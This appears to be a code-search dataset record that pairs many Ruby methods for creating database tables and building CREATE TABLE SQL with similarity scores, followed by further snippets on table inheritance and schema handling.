"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def create_table_from_generator(name, generator, options)\n execute_ddl(create_table_sql(name, generator, options))\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(structure_, data_={})\n Table.new(structure_, data_)\n end",
"def createUserTable(tableName)\n @conn.exec(\"DROP TABLE IF EXISTS #{tableName}\")\n @conn.exec(\"CREATE TABLE #{tableName} (id SERIAL PRIMARY KEY NOT NULL, course_id character varying(255) NOT NULL, name character varying(255), slug character varying(255), course_site character varying(255), instructors character varying(255000), partners character varying(255000), homepage character varying(255000), counter integer not null default 0, url_photo character varying(255000), summary character varying(255000)) WITH (OIDS=FALSE);\");\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def make_table(options={})\n get_table(options).rows\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def migrate\n db.create_table? table_name do\n primary_key :id\n String :ptype\n String :v0\n String :v1\n String :v2\n String :v3\n String :v4\n String :v5\n end\n end",
"def generate_table_def_table()\r\n table_def_name = \"table_definitions\"\r\n\r\n # If the table doesn't already exist, create it\r\n puts \"Creating table definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :primary_key => true, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :formName, :size => db_column_size_limits[:formName]\r\n end\r\n end\r\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def create_user_table(database)\n\tcreate_user_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS users(\n\t\tid INTEGER PRIMARY KEY,\n\t\tname VARCHAR(255) UNIQUE\n\t)\nSQL\n\tdatabase.execute(create_user_table_cmd)\nend",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_tables!\n migrate(:up)\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def make_table(table, *args, others)\n unless others.is_a? Hash\n args << others\n others = {}\n end\n table = table.to_s # probably already was\n table_sym = table.to_sym\n @fields[table_sym] = args + others.keys\n @xform[table_sym] = {:inspect => [], :yaml => []}\n xform, fields = @xform, @fields # because of change in 'self'\n @db.create_table table_sym do\n primary_key table+\"_id\"\n args.each do |field| \n if field.to_s =~ /_id$/\n Integer field \n else\n String field\n end\n end\n others.each_pair do |field, klass|\n case klass.to_s.to_sym\n when :Integer; Integer field\n when :String; String field\n when :Float; Float field\n when :DateTime; DateTime field\n when :Array, :Hash, :Symbol\n String field\n xform[table_sym][:inspect] << field\n when :Yaml\n String field\n xform[table_sym][:yaml] << field\n end\n end\n end\n # Now save metadata...\n args_hash = {}\n args.each {|arg| args_hash.update(arg => :String) }\n args_hash.update(others)\n args_hash.each_pair {|k, v| args_hash[k] = v.to_s.to_sym }\n @db[:metadata].insert(:table => table, :transform => xform[table_sym].to_yaml, \n :fields => fields[table_sym].to_yaml)\n end",
"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_films_table\n @db.execute(\"DROP TABLE Films\")\n @db.execute(<<EOF\nCREATE TABLE films (\n title VARCHAR(200),\n date DATETIME,\n channel VARCHAR(200),\n start_time TIME,\n end_time TIME,\n year NUMBER,\n description TEXT,\n duration NUMBER,\n PRIMARY KEY(title, date, channel)\n);\nEOF\n )\nend",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def createUserTable\n @Handle.execute( @UserSchema ) \n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def createurlTable\n @conn.exec(\"CREATE TABLE urls (uid serial NOT NULL, loc character varying(255), CONSTRAINT urls_pkey PRIMARY KEY (uid)) WITH (OIDS=FALSE);\");\n end",
"def new_table(name, field_defs, encrypt, record_class)\r\n # Header rec consists of last record no. used, delete count, and\r\n # all field names/types. Here, I am inserting the 'recno' field\r\n # at the beginning of the fields.\r\n header_rec = ['000000', '000000', record_class, 'recno:Integer',\r\n field_defs].join('|')\r\n\r\n header_rec = 'Z' + encrypt_str(header_rec) if encrypt\r\n\r\n begin\r\n fptr = open(File.join(@db.path, name.to_s + @db.ext), 'w')\r\n fptr.write(header_rec + \"\\n\")\r\n ensure\r\n fptr.close\r\n end\r\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end"
] |
[
"0.7415012",
"0.72220755",
"0.7216366",
"0.7109741",
"0.70924604",
"0.7069454",
"0.7053471",
"0.7051891",
"0.70443887",
"0.70225674",
"0.6937419",
"0.6934067",
"0.6926212",
"0.68763155",
"0.6873812",
"0.6843173",
"0.68393475",
"0.6811212",
"0.68088245",
"0.672029",
"0.66978526",
"0.66966957",
"0.66939723",
"0.6648195",
"0.66194695",
"0.661876",
"0.6553903",
"0.65321386",
"0.6527483",
"0.65170705",
"0.6495914",
"0.64946234",
"0.6490551",
"0.64899147",
"0.6477656",
"0.64686096",
"0.6461675",
"0.64548874",
"0.6453056",
"0.6442504",
"0.6425454",
"0.64215106",
"0.6421322",
"0.64098275",
"0.64093584",
"0.6404908",
"0.6400859",
"0.639014",
"0.63787735",
"0.63775223",
"0.63734925",
"0.634473",
"0.63405937",
"0.6322195",
"0.6322154",
"0.6311097",
"0.631003",
"0.62728155",
"0.62725943",
"0.6272568",
"0.62717813",
"0.6250932",
"0.62493414",
"0.6221908",
"0.6208916",
"0.6201232",
"0.6191322",
"0.61697936",
"0.6166806",
"0.61657923",
"0.61422133",
"0.61287075",
"0.6125567",
"0.6118668",
"0.61182773",
"0.6098779",
"0.60923195",
"0.60907376",
"0.60761017",
"0.60750484",
"0.604912",
"0.60401446",
"0.60288644",
"0.6026149",
"0.60258996",
"0.6023665",
"0.60193825",
"0.60118353",
"0.59930915",
"0.59920186",
"0.59839165",
"0.5982744",
"0.59825",
"0.5979823",
"0.59782636",
"0.59605104",
"0.5950756",
"0.5947432",
"0.59401053",
"0.5939742"
] |
0.672513
|
19
|
Handle various PostgreSQl specific table extensions such as inheritance, partitioning, tablespaces, and foreign tables.
|
def create_table_suffix_sql(name, options)
sql = String.new
if inherits = options[:inherits]
sql << " INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})"
end
if partition_by = options[:partition_by]
sql << " PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}"
end
if on_commit = options[:on_commit]
raise(Error, "can't provide :on_commit without :temp to create_table") unless options[:temp]
raise(Error, "unsupported on_commit option: #{on_commit.inspect}") unless ON_COMMIT.has_key?(on_commit)
sql << " ON COMMIT #{ON_COMMIT[on_commit]}"
end
if tablespace = options[:tablespace]
sql << " TABLESPACE #{quote_identifier(tablespace)}"
end
if server = options[:foreign]
sql << " SERVER #{quote_identifier(server)}"
if foreign_opts = options[:options]
sql << " OPTIONS (#{foreign_opts.map{|k, v| "#{k} #{literal(v.to_s)}"}.join(', ')})"
end
end
sql
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def extended_table(extra = nil, **opt)\n sql = sql_extended_table(extra, **opt)\n ActiveRecord::Base.connection.exec_query(sql)\n end",
"def inherited_tables\n tables = query(<<-SQL, 'SCHEMA')\n SELECT child.relname AS table_name,\n array_agg(parent.relname) AS inheritances\n FROM pg_inherits\n JOIN pg_class parent ON pg_inherits.inhparent = parent.oid\n JOIN pg_class child ON pg_inherits.inhrelid = child.oid\n GROUP BY child.relname, pg_inherits.inhrelid\n ORDER BY pg_inherits.inhrelid\n SQL\n\n tables.map do |(table, refs)|\n [table, Coder.decode(refs)]\n end.to_h\n end",
"def additional_support_tables\n additional_tables.map { |scale| OVERLAY_TABLENAME % [scale, table_name] }\n end",
"def additional_support_tables\n additional_tables.map { |scale| OVERLAY_TABLENAME % [scale, table_name] }\n end",
"def revise_table\n name = @table_extension.name\n @table_extension.extended.each do |method_name|\n define_extension_setter(name, method_name)\n define_extension_getter(name, method_name)\n define_extension_dirty(name, method_name)\n end\n @table_extension.mirrored.each do |method_name|\n define_extension_mirror_setter(name, method_name)\n end\n true\n end",
"def table_name_prefix\n \"ext_#{self.registered_name.to_s.underscore}_\"\n end",
"def create_extension_view_and_class\n self.const_get(\"Extended#{to_s}\")\n rescue\n clause = view_builder\n #this needs to be moved into the specific db adapter files\n connection.execute %{\n create or replace algorithm = merge SQL SECURITY DEFINER view #{extended_table_name} as select #{clause[:view_select]} from #{table_name} #{clause[:view_joins]}#{clause[:view_conditions]}\n }\n class_eval %{\n class Extended#{to_s} < #{to_s}\n set_table_name \"#{extended_table_name}\"\n def self.descends_from_active_record?\n true\n end\n end\n }\n true\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def table_name; \"gdo_module\"; end",
"def table_name_prefix; end",
"def pg_table_name\n table_name\n end",
"def table_schema(tbl)\n column_sql = <<-eosql\nSELECT rf.rdb$field_name AS \"name\",\n field.rdb$field_type AS \"type_code\",\n field.rdb$field_sub_type AS \"subtype_code\",\n-- -- -- field.rdb$field_length AS \"length\", -- -- --\n field.rdb$field_precision AS \"precision\",\n field.rdb$field_scale AS \"scale\",\n CASE\n WHEN rf.rdb$null_flag > 0\n THEN 'NO'\n ELSE 'YES'\n END AS \"nullable\",\n CASE\n WHEN iseg.rdb$index_name IS NOT NULL\n THEN 'YES'\n ELSE 'NO'\n END AS \"primary_key\"\nFROM rdb$relation_fields rf\nJOIN rdb$fields field ON rf.rdb$field_source = field.rdb$field_name\nLEFT JOIN rdb$relation_constraints c\n ON c.rdb$relation_name = rf.rdb$relation_name\n AND\n c.rdb$constraint_type = 'PRIMARY KEY'\nLEFT JOIN rdb$index_segments iseg\n ON iseg.rdb$index_name = c.rdb$index_name\n AND\n iseg.rdb$field_name = rf.rdb$field_name\nWHERE rf.rdb$relation_name = ?\nORDER BY rf.rdb$field_position, rf.rdb$field_name\neosql\n\n info = RDBI::Schema.new([], [])\n res = execute(column_sql, tbl.to_s.upcase)\n res.as(:Struct)\n while row = res.fetch[0]\n type = RDBI::Driver::Rubyfb::Types::field_type_to_rubyfb(row[:type_code], row[:subtype_code])\n info.columns << RDBI::Column.new(\n row[:name].to_sym,\n type,\n RDBI::Driver::Rubyfb::Types::rubyfb_to_rdbi(type, row[:scale]),\n row[:precision],\n row[:scale],\n row[:nullable] == 'YES',\n #nil, # metadata\n #nil, # default\n #nil, # table\n )\n 